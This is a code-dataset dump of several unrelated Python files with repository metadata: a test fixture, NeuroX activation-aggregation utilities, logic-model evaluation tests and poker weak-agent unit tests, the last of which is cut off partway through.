|
src/daipecore/decorator/tests/notebook_function_fixture.py
|
daipe-ai/daipe-core
|
aa205495fa6b464fa6078d17e439c60345ac99ea
|
[
"MIT"
] | null | null | null |
from daipecore.decorator.notebook_function import notebook_function
@notebook_function
def load_data():
    """Test fixture: return the constant sentinel value 155.

    Wrapped with ``notebook_function`` so the decorator's behaviour can be
    exercised; the decorator comes from the project package, so its exact
    runtime effect is not visible here.
    """
    return 155
| 17.285714
| 67
| 0.826446
| 15
| 121
| 6.4
| 0.733333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028302
| 0.123967
| 121
| 6
| 68
| 20.166667
| 0.877358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
4cb2cdedd09079e23a93411498c4e4df1b5bb2ca
| 11,770
|
py
|
Python
|
neurox/data/representations.py
|
qcri/NeuroX
|
a56528231f6514412f3703af48effce1404cb069
|
[
"BSD-3-Clause"
] | 87
|
2018-12-12T11:58:21.000Z
|
2022-03-26T19:19:46.000Z
|
neurox/data/representations.py
|
qcri/NeuroX
|
a56528231f6514412f3703af48effce1404cb069
|
[
"BSD-3-Clause"
] | 16
|
2019-07-08T23:45:18.000Z
|
2022-03-30T14:46:40.000Z
|
neurox/data/representations.py
|
qcri/NeuroX
|
a56528231f6514412f3703af48effce1404cb069
|
[
"BSD-3-Clause"
] | 15
|
2019-02-12T08:52:35.000Z
|
2022-03-15T13:13:32.000Z
|
"""Utility functions to manage representations.
This module contains functions that will help in managing extracted
representations, specifically on sub-word based data.
"""
import numpy as np
from tqdm import tqdm
def bpe_get_avg_activations(tokens, activations):
    """Aggregates activations by averaging, assuming BPE-based tokenization.

    Given loaded tokens data and activations, this function aggregates
    activations based on tokenized text. BPE-based tokenization is assumed,
    with every non-terminal subword ending with "@@". The activations are
    aggregated by averaging over subwords.

    .. warning::
        This function is deprecated and will be removed in future versions.

    Parameters
    ----------
    tokens : dict
        Dictionary containing three lists, ``source``, ``source_aux`` and
        ``target``. Usually the output of ``data.loader.load_aux_data``.
    activations : list of numpy.ndarray
        Activations returned from ``loader.load_activations``. Each entry
        must support ``.size(1)`` (e.g. a torch tensor) giving the number
        of neurons.

    Returns
    -------
    activations : list of numpy.ndarray
        Subword-aggregated activations, one row per actual token found in
        the untokenized text.
    """
    all_activations = []
    num_neurons = activations[0].size(1)
    for i in range(len(tokens["source_aux"])):
        # Hoist the per-sentence lists once instead of re-indexing the dict
        # on every access (the original also bound source_aux but never used it).
        source = tokens["source"][i]
        source_aux = tokens["source_aux"][i]
        num_words = len(source)
        new_activations = np.zeros((num_words, num_neurons))

        # Find the index of the last subword of every full word.
        word_boundaries = []
        source_index = 0
        current_bpe = ""
        for j, subword in enumerate(source_aux):
            current_bpe += subword
            if current_bpe != source[source_index]:
                # Non-terminal subword: drop the trailing "@@" marker.
                current_bpe = current_bpe[:-2]
            else:
                word_boundaries.append(j)
                source_index += 1
                current_bpe = ""
        assert len(word_boundaries) == num_words

        # Average the activation rows of each word's subwords.
        prev_idx = 0
        for word_idx, boundary in enumerate(word_boundaries):
            avg_vector = np.average(activations[i][prev_idx : boundary + 1, :], axis=0)
            new_activations[word_idx, :] = avg_vector
            prev_idx = boundary + 1
        all_activations.append(new_activations)
    return all_activations
def bpe_get_last_activations(tokens, activations, is_brnn=True):
    """Aggregates activations by picking boundary subwords, assuming BPE tokenization.

    Given loaded tokens data and activations, this function aggregates
    activations based on tokenized text. BPE-based tokenization is assumed,
    with every non-terminal subword ending with "@@". For each word, the
    forward half of the neurons is taken from the word's *last* subword and,
    for bidirectional models, the backward half from its *first* subword.

    .. warning::
        This function is deprecated and will be removed in future versions.

    Parameters
    ----------
    tokens : dict
        Dictionary containing three lists, ``source``, ``source_aux`` and
        ``target``. Usually the output of ``data.loader.load_aux_data``.
    activations : list of numpy.ndarray
        Activations returned from ``loader.load_activations``. Each entry
        must support ``.size(1)`` (e.g. a torch tensor).
    is_brnn : bool, optional
        Whether the model from which activations were extracted was
        bidirectional. Only applies for RNN models.

    Returns
    -------
    activations : list of numpy.ndarray
        Subword-aggregated activations, one row per actual token found in
        the untokenized text.
    """
    all_activations = []
    num_neurons = activations[0].size(1)
    for i in range(len(tokens["source_aux"])):
        # Hoisted per-sentence lists (the original bound source_aux unused).
        source = tokens["source"][i]
        source_aux = tokens["source_aux"][i]
        num_words = len(source)
        new_activations = np.zeros((num_words, num_neurons))

        # Find the index of the last subword of every full word.
        word_boundaries = []
        source_index = 0
        current_bpe = ""
        for j, subword in enumerate(source_aux):
            current_bpe += subword
            if current_bpe != source[source_index]:
                # Non-terminal subword: drop the trailing "@@" marker.
                current_bpe = current_bpe[:-2]
            else:
                word_boundaries.append(j)
                source_index += 1
                current_bpe = ""
        assert len(word_boundaries) == num_words

        # Neurons [0, rnn_boundary) hold the forward pass; for BiRNNs,
        # [rnn_boundary, num_neurons) hold the backward pass.
        rnn_boundary = num_neurons // 2 if is_brnn else num_neurons

        prev_idx = 0
        for word_idx, boundary in enumerate(word_boundaries):
            new_activations[word_idx, :rnn_boundary] = activations[i][
                boundary, :rnn_boundary
            ]
            if is_brnn:
                # Backward direction: the "last" state is at the word's start.
                new_activations[word_idx, rnn_boundary:] = activations[i][
                    prev_idx, rnn_boundary:
                ]
            prev_idx = boundary + 1
        all_activations.append(new_activations)
    return all_activations
def char_get_avg_activations(tokens, activations):
    """Aggregates activations by averaging, assuming character-based tokenization.

    Given loaded tokens data and activations, this function aggregates
    activations based on character-tokenized text (words separated by a
    single "_" token). The activations are aggregated by averaging over the
    characters of each word.

    .. warning::
        This function is deprecated and will be removed in future versions.

    Parameters
    ----------
    tokens : dict
        Dictionary containing three lists, ``source``, ``source_aux`` and
        ``target``. Usually the output of ``data.loader.load_aux_data``.
    activations : list of numpy.ndarray
        Activations returned from ``loader.load_activations``. Each entry
        must support ``.size(1)`` (e.g. a torch tensor).

    Returns
    -------
    activations : list of numpy.ndarray
        Character-aggregated activations, one row per actual token found in
        the untokenized text.
    """
    all_activations = []
    num_neurons = activations[0].size(1)
    for i in tqdm(range(len(tokens["source_aux"]))):
        # Hoisted per-sentence lists; the original also bound sourceIndex and
        # thisChar, which were never used — removed.
        source = tokens["source"][i]
        source_aux = tokens["source_aux"][i]
        num_words = len(source)
        new_activations = np.zeros((num_words, num_neurons))

        # Boundary = index of the last character of each word in the
        # character stream; every word after the first is preceded by one
        # "_" separator token (hence the +1).
        word_boundaries = []
        for word_idx, word in enumerate(source):
            if word_idx == 0:
                word_boundaries.append(len(word) - 1)
            else:
                word_boundaries.append(len(word) + 1 + word_boundaries[-1])
        if len(word_boundaries) != num_words:
            print(i, len(word_boundaries), num_words)
        assert len(word_boundaries) == num_words
        # Sanity check: separator count in the character stream must agree
        # with the word count (underscores inside words are discounted).
        assert (
            source_aux.count("_") + 1 - source.count("_") == num_words
        ), "Number of words dont match! (line: %d, source: %d, aux: %d)\n%s\n%s" % (
            i + 1,
            num_words,
            source_aux.count("_") + 1,
            " ".join(source),
            " ".join(source_aux),
        )

        prev_idx = 0
        for word_idx, boundary in enumerate(word_boundaries):
            avg_vector = np.average(activations[i][prev_idx : boundary + 1, :], axis=0)
            new_activations[word_idx, :] = avg_vector
            # +2 skips the "_" separator between words.
            prev_idx = boundary + 2
        all_activations.append(new_activations)
    return all_activations
def char_get_last_activations(tokens, activations, is_brnn=True):
    """Aggregates activations by picking boundary characters, assuming character tokenization.

    Given loaded tokens data and activations, this function aggregates
    activations based on character-tokenized text (words separated by a
    single "_" token). For each word, the forward half of the neurons is
    taken from the word's *last* character and, for bidirectional models,
    the backward half from the position just after the previous word.

    .. warning::
        This function is deprecated and will be removed in future versions.

    Parameters
    ----------
    tokens : dict
        Dictionary containing three lists, ``source``, ``source_aux`` and
        ``target``. Usually the output of ``data.loader.load_aux_data``.
    activations : list of numpy.ndarray
        Activations returned from ``loader.load_activations``. Each entry
        must support ``.size(1)`` (e.g. a torch tensor).
    is_brnn : bool, optional
        Whether the model from which activations were extracted was
        bidirectional. Only applies for RNN models.

    Returns
    -------
    activations : list of numpy.ndarray
        Character-aggregated activations, one row per actual token found in
        the untokenized text.
    """
    all_activations = []
    num_neurons = activations[0].size(1)
    for i in tqdm(range(len(tokens["source_aux"]))):
        # Hoisted per-sentence lists; the original also bound sourceIndex and
        # thisChar, which were never used — removed.
        source = tokens["source"][i]
        source_aux = tokens["source_aux"][i]
        num_words = len(source)
        new_activations = np.zeros((num_words, num_neurons))

        # Boundary = index of the last character of each word in the
        # character stream; every word after the first is preceded by one
        # "_" separator token (hence the +1).
        word_boundaries = []
        for word_idx, word in enumerate(source):
            if word_idx == 0:
                word_boundaries.append(len(word) - 1)
            else:
                word_boundaries.append(len(word) + 1 + word_boundaries[-1])
        if len(word_boundaries) != num_words:
            print(i, len(word_boundaries), num_words)
        assert len(word_boundaries) == num_words
        # Sanity check: separator count in the character stream must agree
        # with the word count (underscores inside words are discounted).
        assert (
            source_aux.count("_") + 1 - source.count("_") == num_words
        ), "Number of words dont match! (line: %d, source: %d, aux: %d)\n%s\n%s" % (
            i + 1,
            num_words,
            source_aux.count("_") + 1,
            " ".join(source),
            " ".join(source_aux),
        )

        # Forward neurons in [0, rnn_boundary); backward in the rest.
        rnn_boundary = num_neurons // 2 if is_brnn else num_neurons

        prev_idx = 0
        for word_idx, boundary in enumerate(word_boundaries):
            new_activations[word_idx, :rnn_boundary] = activations[i][
                boundary, :rnn_boundary
            ]
            if is_brnn:
                new_activations[word_idx, rnn_boundary:] = activations[i][
                    prev_idx, rnn_boundary:
                ]
            # NOTE(review): unlike the averaging variant, this advances by +1,
            # so for every word after the first the backward state is read at
            # the "_" separator rather than the word's first character —
            # preserved as-is, but confirm the asymmetry is intended.
            prev_idx = boundary + 1
        all_activations.append(new_activations)
    return all_activations
def sent_get_last_activations(tokens, activations):
    """Gets the summary vector for the input sentences.

    Given loaded tokens data and activations, this function picks the final
    token's activations for every sentence, essentially giving summary
    vectors for every sentence in the dataset. This is mostly applicable
    for RNNs.

    .. note::
        Bidirectionality is currently not handled in the case of BiRNNs.

    Parameters
    ----------
    tokens : dict
        Dictionary containing three lists, ``source``, ``source_aux`` and
        ``target``. Usually the output of ``data.loader.load_aux_data``.
    activations : list of numpy.ndarray
        Activations returned from ``loader.load_activations``. Each entry
        must support ``.size(1)`` (e.g. a torch tensor).

    Returns
    -------
    activations : list of numpy.ndarray
        Summary activations, one ``(1, num_neurons)`` array per sentence in
        the original text.
    """
    all_activations = []
    num_neurons = activations[0].size(1)
    # The original bound source/num_words per sentence but never used them —
    # only the sentence count and the last activation row matter here.
    for i in tqdm(range(len(tokens["source"]))):
        new_activations = np.zeros((1, num_neurons))
        new_activations[0, :] = activations[i][-1, :]
        all_activations.append(new_activations)
    return all_activations
| 34.017341
| 96
| 0.615293
| 1,355
| 11,770
| 5.191144
| 0.129889
| 0.054592
| 0.038385
| 0.031845
| 0.924367
| 0.918396
| 0.912994
| 0.909298
| 0.898635
| 0.885272
| 0
| 0.007363
| 0.284537
| 11,770
| 345
| 97
| 34.115942
| 0.82793
| 0.390909
| 0
| 0.882716
| 0
| 0.012346
| 0.060606
| 0
| 0
| 0
| 0
| 0
| 0.037037
| 1
| 0.030864
| false
| 0
| 0.012346
| 0
| 0.074074
| 0.012346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ceea5f4cec9bb94754cc5da49b08837bb9ff83a
| 119
|
py
|
Python
|
baseline/exp3_2d3ds/models/__init__.py
|
COATZ/ugscnn
|
23feb8465863aa473048ca40ede651356d977ac3
|
[
"MIT"
] | null | null | null |
baseline/exp3_2d3ds/models/__init__.py
|
COATZ/ugscnn
|
23feb8465863aa473048ca40ede651356d977ac3
|
[
"MIT"
] | null | null | null |
baseline/exp3_2d3ds/models/__init__.py
|
COATZ/ugscnn
|
23feb8465863aa473048ca40ede651356d977ac3
|
[
"MIT"
] | null | null | null |
from .duc_hdc import *
from .fcn8s import *
from .fcn8s_sphe import *
from .u_net import *
from .u_net_sphe import *
| 23.8
| 26
| 0.731092
| 20
| 119
| 4.1
| 0.4
| 0.487805
| 0.365854
| 0.341463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020619
| 0.184874
| 119
| 5
| 27
| 23.8
| 0.824742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e250f528fd76634c6baafa2a9c6f0344b23f0a5b
| 8,654
|
py
|
Python
|
old/old/model_tests.py
|
avigad/boole
|
2a436c2967dbc968f6a5877c220b9757c3bc17c3
|
[
"Apache-2.0"
] | 16
|
2015-01-01T18:21:35.000Z
|
2021-11-20T00:39:25.000Z
|
old/old/model_tests.py
|
avigad/boole
|
2a436c2967dbc968f6a5877c220b9757c3bc17c3
|
[
"Apache-2.0"
] | null | null | null |
old/old/model_tests.py
|
avigad/boole
|
2a436c2967dbc968f6a5877c220b9757c3bc17c3
|
[
"Apache-2.0"
] | 1
|
2021-05-14T11:12:31.000Z
|
2021-05-14T11:12:31.000Z
|
##################################################
#
# Tests for model.py
#
#
#
#
#
#
#
#
#
#
#
##################################################
from boole.core.model import *
from boole.core.language import clear_default_language
from nose.tools import *
def is_prime(x):
    """Return True if ``x`` is a prime number, False otherwise.

    Uses simple trial division (fine for the small model domains used in
    these tests). Bug fix: the original fell through to the trial-division
    loop for negative inputs, whose empty ``range(2, x)`` made it vacuously
    return True; everything below 2 is now correctly non-prime.
    """
    if x < 2:
        return False
    for i in range(2, x):
        if x % i == 0:
            return False
    return True
def test_val_strict():
    """Exercise strict evaluation (``val_strict``) over enums, arithmetic,
    propositional connectives, quantifiers and a user-supplied model.

    Strict evaluation requires every constant appearing in a term to have a
    value, either built-in or supplied by the model ``M``.
    """
    #It is annoying that types can not be redefined: turn into a warning?
    clear_default_language()
    # Typed variables and a three-element enumerated type.
    x, y, z = Int('x y z')
    p, q, r, s = Bool('p q r s')
    People = EnumType('People', ['Alice', 'Bob', 'Carol'])
    Alice, Bob, Carol = People.make_constants()
    u1, u2, u3, u4, u5 = People('u1 u2 u3 u4 u5')
    # Literals and arithmetic evaluate to plain Python values.
    assert_equal(val_strict(ii(3)), 3)
    assert_equal(val_strict(rr(4.5)), 4.5)
    assert_equal(val_strict(-ii(3) + (4.5) * (2)), 6)
    assert_equal(val_strict(Alice), 'Alice')
    assert_equal(val_strict(Bob), 'Bob')
    # Quantifiers over the finite People domain.
    assert(val_strict(Forall(u1, (u1 == Alice) | (u1 == Bob) | (u1 == Carol))))
    assert(not val_strict(Forall(u1, (u1 == Alice) | (u1 == Bob))))
    assert(not val_strict(true != true))
    # Only three distinct people exist, so four pairwise-distinct ones cannot.
    assert(not val_strict(Exists([u1, u2, u3, u4], And(u1 != u2, u1 != u3, u1 != u4,
                                                       u2 != u3, u2 != u4, u3 != u4))))
    # Propositional connectives and lambda-abstraction application.
    assert(val_strict(true & (false >> true)))
    assert(not val_strict(true & ~(false >> true)))
    assert(val_strict(Abs([x, y], x + y)((5), (7))))
    assert(val_strict(Exists(p, p)))
    e = Exists([p, q, r], (p >> q & r) & ~(r >> p & q))
    assert(val_strict(e))
    assert(not val_strict(Forall([p,q], Exists(r, p >> r & q >> ~r))))
    # Peirce's law holds classically.
    assert(val_strict(Forall([p,q], (((p >> q) >> p) >> p))))
    # NOTE(review): the next four declarations are repeated verbatim below —
    # presumably accidental duplication; harmless, left untouched.
    a, b, c = Int('a, b, c')
    Even = Const('Even', Int >> Bool)
    Prime = Const('Prime', Int >> Bool)
    suc, square = (Int >> Int)('suc, square')
    a, b, c = Int('a, b, c')
    Even = Const('Even', Int >> Bool)
    Prime = Const('Prime', Int >> Bool)
    suc, square = (Int >> Int)('suc, square')
    # Model over integers 0..20 with interpretations for each constant.
    M = Model({(a, 5), (b, 2), (c, 7)})
    M[Int] = dom_range(0,20)
    M[Even] = lambda x: x % 2 == 0
    M[Prime] = is_prime
    M[suc] = lambda x: x + 1
    M[square] = lambda x: x * x
    assert_equal(val_strict(a, M), 5)
    assert_equal(val_strict(a + b * c, M), 19)
    assert(val_strict(Exists(x, b + x == c), M))
    assert(not val_strict(Even(a), M))
    assert(val_strict(Prime((23)), M))
    assert(not val_strict(Prime((22)), M))
    assert(val_strict(And(Prime(a), Prime(b), Prime(c)), M))
    assert(val_strict(Even(c) | And(Prime(a), Prime(b), Prime(c)), M))
    assert(not val_strict(Even(c) | And(Prime(suc(a)), Prime(suc(b)), Prime(c)), M))
    assert(val_strict(Exists(x, Even(x)), M))
    assert(val_strict(Exists(x, And(Prime(x), Even(x))), M))
    assert(not val_strict(Exists(x, And(Prime(x), Even(x), c < x)), M))
    assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y)), M))
    assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x != y)), M))
    assert(not val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(y))), M))
    assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(x))), M))
    assert(not val_strict(Forall(x, Even(x)), M))
    assert(val_strict(Forall(x, Or(Even(x), ~Even(x))), M))
    assert(val_strict(Forall(x, Even(x) >> ~Even(suc(x))), M))
    assert(val_strict(Forall(x, Even(x) >> Even(square(x))), M))
    assert(not val_strict(Exists(x, And(Even(x), ~Even(square(x)))), M))
    assert(val_strict(Forall(x, Even(square(x)) >> Even(x)), M))
    assert(not val_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> Even(x)), M))
    assert(val_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> ~Even(y)), M))
    # The domain is finite (0..20), so there is no y above the maximum.
    assert(not val_strict(Forall(x, Exists(y, x < y)), M))
    assert(not val_strict(Forall([x, y], x < y >> Exists(z, And(x < z, z < y))), M))
    assert(val_strict(Forall([x, y], And(Even(x), Even(y), x < y) >>
                             Exists(z, (x < z) & (z < y))), M))
    # Goldbach's conjecture holds on this small finite domain.
    def precond(n):
        return ((2) < n) & Even(n)
    def goldbach(n):
        return precond(n) >> Exists([x,y], Prime(x) & Prime(y) & (x + y == n))
    Goldbach = Forall(z, goldbach(z))
    assert(val_strict(Goldbach, M))
def test_val_non_strict():
    """Exercise non-strict evaluation (``val_non_strict``).

    Non-strict evaluation mirrors ``val_strict`` but tolerates unvalued
    subterms: an uninterpreted variable evaluates to ``None``, and a
    disjunction like ``true | p`` succeeds without a value for ``p``.
    """
    clear_default_language()
    # Typed variables and a three-element enumerated type.
    x, y, z = Int('x y z')
    p, q, r, s = Bool('p q r s')
    People = EnumType('People', ['Alice', 'Bob', 'Carol'])
    Alice, Bob, Carol = People.make_constants()
    u1, u2, u3, u4, u5 = People('u1 u2 u3 u4 u5')
    # Literals and arithmetic evaluate to plain Python values.
    assert_equal(val_non_strict(ii(3)), 3)
    assert_equal(val_non_strict(rr(4.5)), 4.5)
    assert_equal(val_non_strict(-(3) + (4.5) * ii(2)), 6)
    assert_equal(val_non_strict(Alice), 'Alice')
    assert_equal(val_non_strict(Bob), 'Bob')
    # An unvalued variable evaluates to None instead of raising.
    assert_equal(val_non_strict(x), None)
    # Quantifiers over the finite People domain.
    assert(val_non_strict(Forall(u1, (u1 == Alice) | (u1 == Bob) | (u1 == Carol))))
    assert(not val_non_strict(Forall(u1, (u1 == Alice) | (u1 == Bob))))
    assert(not val_non_strict(true != true))
    # Only three distinct people exist, so four pairwise-distinct ones cannot.
    assert(not val_non_strict(Exists([u1, u2, u3, u4], And(u1 != u2, u1 != u3, u1 != u4,
                                                           u2 != u3, u2 != u4, u3 != u4))))
    # Propositional connectives and lambda-abstraction application.
    assert(val_non_strict(true & (false >> true)))
    assert(not val_non_strict(true & ~(false >> true)))
    assert(val_non_strict(Abs([x, y], x + y)((5), (7))))
    assert(val_non_strict(Exists(p, p)))
    e = Exists([p, q, r], (p >> q & r) & ~(r >> p & q))
    assert(val_non_strict(e))
    assert(not val_non_strict(Forall([p,q], Exists(r, p >> r & q >> ~r))))
    # Peirce's law holds classically.
    assert(val_non_strict(Forall([p,q], (((p >> q) >> p) >> p))))
    # Short-circuits even though p has no value — the non-strict case proper.
    assert(val_non_strict(true | p))
    # NOTE(review): the next four declarations are repeated verbatim below —
    # presumably accidental duplication; harmless, left untouched.
    a, b, c = Int('a, b, c')
    Even = Const('Even', Int >> Bool)
    Prime = Const('Prime', Int >> Bool)
    suc, square = (Int >> Int)('suc, square')
    a, b, c = Int('a, b, c')
    Even = Const('Even', Int >> Bool)
    Prime = Const('Prime', Int >> Bool)
    suc, square = (Int >> Int)('suc, square')
    # Model over integers 0..20 with interpretations for each constant.
    M = Model({(a, 5), (b, 2), (c, 7)})
    M[Int] = dom_range(0,20)
    M[Even] = lambda x: x % 2 == 0
    M[Prime] = is_prime
    M[suc] = lambda x: x + 1
    M[square] = lambda x: x * x
    assert_equal(val_non_strict(a, M), 5)
    assert_equal(val_non_strict(a + b * c, M), 19)
    assert(val_non_strict(Exists(x, b + x == c), M))
    assert(not val_non_strict(Even(a), M))
    assert(val_non_strict(Prime((23)), M))
    assert(not val_non_strict(Prime((22)), M))
    assert(val_non_strict(And(Prime(a), Prime(b), Prime(c)), M))
    assert(val_non_strict(Even(c) | And(Prime(a), Prime(b), Prime(c)), M))
    assert(not val_non_strict(Even(c) | And(Prime(suc(a)), Prime(suc(b)), Prime(c)), M))
    assert(val_non_strict(Exists(x, Even(x)), M))
    assert(val_non_strict(Exists(x, And(Prime(x), Even(x))), M))
    assert(not val_non_strict(Exists(x, And(Prime(x), Even(x), c < x)), M))
    assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y)), M))
    assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x != y)), M))
    assert(not val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(y))), M))
    assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(x))), M))
    assert(not val_non_strict(Forall(x, Even(x)), M))
    assert(val_non_strict(Forall(x, Or(Even(x), ~Even(x))), M))
    assert(val_non_strict(Forall(x, Even(x) >> ~Even(suc(x))), M))
    assert(val_non_strict(Forall(x, Even(x) >> Even(square(x))), M))
    assert(not val_non_strict(Exists(x, And(Even(x), ~Even(square(x)))), M))
    assert(val_non_strict(Forall(x, Even(square(x)) >> Even(x)), M))
    assert(not val_non_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> Even(x)), M))
    assert(val_non_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> ~Even(y)), M))
    # The domain is finite (0..20), so there is no y above the maximum.
    assert(not val_non_strict(Forall(x, Exists(y, x < y)), M))
    assert(not val_non_strict(Forall([x, y], x < y >> Exists(z, And(x < z, z < y))), M))
    assert(val_non_strict(Forall([x, y], And(Even(x), Even(y), x < y) >>
                                 Exists(z, (x < z) & (z < y))), M))
    # Goldbach's conjecture holds on this small finite domain.
    def precond(n):
        return ((2) < n) & Even(n)
    def goldbach(n):
        return precond(n) >> Exists([x,y], Prime(x) & Prime(y) & (x + y == n))
    Goldbach = Forall(z, goldbach(z))
    assert(val_non_strict(Goldbach, M))
def test_lazy_models():
    """A lazily enumerated infinite domain can still witness an existential."""
    clear_default_language()

    def naturals():
        # Infinite generator 0, 1, 2, ... backing the lazy domain.
        n = 0
        while True:
            yield n
            n += 1

    prime_pred = Const('Prime', Int >> Bool)
    model = Model()
    model[Int] = Domain('nat', naturals)
    model[prime_pred] = is_prime
    var = Int('x')
    # Evaluation must terminate as soon as the first prime is enumerated.
    assert val_strict(Exists(var, prime_pred(var)), model)
| 38.633929
| 92
| 0.555119
| 1,458
| 8,654
| 3.173525
| 0.071331
| 0.072617
| 0.121893
| 0.089475
| 0.905554
| 0.857143
| 0.79987
| 0.746056
| 0.713205
| 0.690728
| 0
| 0.019645
| 0.217703
| 8,654
| 223
| 93
| 38.807175
| 0.663811
| 0.009938
| 0
| 0.36
| 0
| 0
| 0.026387
| 0
| 0
| 0
| 0
| 0
| 0.52
| 1
| 0.051429
| false
| 0
| 0.017143
| 0.022857
| 0.114286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2b86d9c3452142df7bd7020bf19a4c57caca2de
| 3,520
|
py
|
Python
|
test/weak_agents_tests.py
|
JakubPetriska/poker-agent-kit
|
12c28711c91447c708719454d1fbd224fa03189e
|
[
"MIT"
] | 19
|
2018-09-21T15:27:09.000Z
|
2022-03-09T03:55:21.000Z
|
test/weak_agents_tests.py
|
JakubPetriska/poker-agent-kit
|
12c28711c91447c708719454d1fbd224fa03189e
|
[
"MIT"
] | 6
|
2018-05-09T17:09:58.000Z
|
2019-07-09T15:15:05.000Z
|
test/weak_agents_tests.py
|
JakubPetriska/poker-cfr
|
12c28711c91447c708719454d1fbd224fa03189e
|
[
"MIT"
] | 2
|
2018-09-11T02:49:57.000Z
|
2018-11-17T00:29:38.000Z
|
import unittest
import acpc_python_client as acpc
from tools.constants import Action
from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType
from tools.io_util import read_strategy_from_file
from evaluation.exploitability import Exploitability
from tools.game_utils import is_strategies_equal, is_correct_strategy
KUHN_POKER_GAME_FILE_PATH = 'games/kuhn.limit.2p.game'
LEDUC_POKER_GAME_FILE_PATH = 'games/leduc.limit.2p.game'
class WeakAgentsTests(unittest.TestCase):
    """Tests for action-tilted "weak" poker agents.

    A tilted agent biases the probability of one action (by an additive or
    multiplicative tilt) relative to a base strategy. The result must stay a
    structurally valid strategy and, when derived from an equilibrium,
    should be strictly more exploitable than that equilibrium.
    """

    def test_kuhn_action_tilted_agent_not_crashing(self):
        """Smoke test: training a RAISE/ADD-tilted agent on Kuhn poker yields a valid strategy."""
        strategy = create_agent_strategy(
            KUHN_POKER_GAME_FILE_PATH,
            Action.RAISE,
            TiltType.ADD,
            0.2,
            cfr_iterations=20,
            cfr_weight_delay=2,
            show_progress=False)
        self.assertTrue(is_correct_strategy(strategy))

    def test_leduc_add_action_tilted_agent_not_crashing(self):
        """Smoke test on the larger Leduc game with an additive FOLD tilt."""
        strategy = create_agent_strategy(
            LEDUC_POKER_GAME_FILE_PATH,
            Action.FOLD,
            TiltType.ADD,
            0.1,
            cfr_iterations=5,
            cfr_weight_delay=2,
            show_progress=False)
        self.assertTrue(is_correct_strategy(strategy))

    def test_leduc_multiply_action_tilted_agent_not_crashing(self):
        """Smoke test on Leduc with a multiplicative FOLD tilt."""
        strategy = create_agent_strategy(
            LEDUC_POKER_GAME_FILE_PATH,
            Action.FOLD,
            TiltType.MULTIPLY,
            0.1,
            cfr_iterations=5,
            cfr_weight_delay=2,
            show_progress=False)
        self.assertTrue(is_correct_strategy(strategy))

    def test_kuhn_action_tilted_agent(self):
        """Tilting a precomputed Kuhn equilibrium towards RAISE must produce a
        different, valid strategy that is more exploitable than the equilibrium."""
        kuhn_equilibrium, _ = read_strategy_from_file(
            KUHN_POKER_GAME_FILE_PATH,
            'strategies/kuhn.limit.2p-equilibrium.strategy')
        game = acpc.read_game_file(KUHN_POKER_GAME_FILE_PATH)
        exploitability = Exploitability(game)
        tilted_agent_strategy = create_agent_strategy_from_trained_strategy(
            KUHN_POKER_GAME_FILE_PATH,
            kuhn_equilibrium,
            Action.RAISE,
            TiltType.ADD,
            0.2)
        self.assertTrue(is_correct_strategy(tilted_agent_strategy))
        self.assertTrue(not is_strategies_equal(kuhn_equilibrium, tilted_agent_strategy))
        equilibrium_exploitability = exploitability.evaluate(kuhn_equilibrium)
        raise_add_tilted_exploitability = exploitability.evaluate(tilted_agent_strategy)
        self.assertTrue(raise_add_tilted_exploitability > equilibrium_exploitability)

    def test_kuhn_action_minus_tilted_agent(self):
        """A negative ADD tilt (away from CALL) must likewise yield a valid,
        distinct and more exploitable strategy."""
        kuhn_equilibrium, _ = read_strategy_from_file(
            KUHN_POKER_GAME_FILE_PATH,
            'strategies/kuhn.limit.2p-equilibrium.strategy')
        game = acpc.read_game_file(KUHN_POKER_GAME_FILE_PATH)
        exploitability = Exploitability(game)
        tilted_agent_strategy = create_agent_strategy_from_trained_strategy(
            KUHN_POKER_GAME_FILE_PATH,
            kuhn_equilibrium,
            Action.CALL,
            TiltType.ADD,
            -0.5)
        self.assertTrue(is_correct_strategy(tilted_agent_strategy))
        self.assertTrue(not is_strategies_equal(kuhn_equilibrium, tilted_agent_strategy))
